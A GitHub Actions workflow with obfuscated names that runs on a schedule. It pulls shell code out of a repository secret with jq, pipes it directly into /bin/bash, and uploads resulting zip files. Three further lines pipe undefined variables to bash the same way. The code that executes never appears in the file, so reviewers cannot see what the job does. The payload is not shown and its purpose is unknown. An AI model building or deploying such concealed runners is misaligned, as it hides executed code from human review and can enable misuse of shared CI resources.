name: jingbaofanmu
on:
  workflow_dispatch:

  schedule:
    - cron: '6 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jingbaofanmu
        env:
          yer30594: ${{ secrets.yer30594 }}
        run: |
          printf '%s' "$yer30594" | jq -r .oo06023 | /bin/bash
          echo $ecwgs583 | jq -r .el7 | /bin/bash
          printf '%s' "$sair31082" | jq -r .srpgg763 | /bin/bash
          echo $yaao53 | jq -r .wd35 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 9fJppNYh
          path: "*.zip"
          retention-days: 1
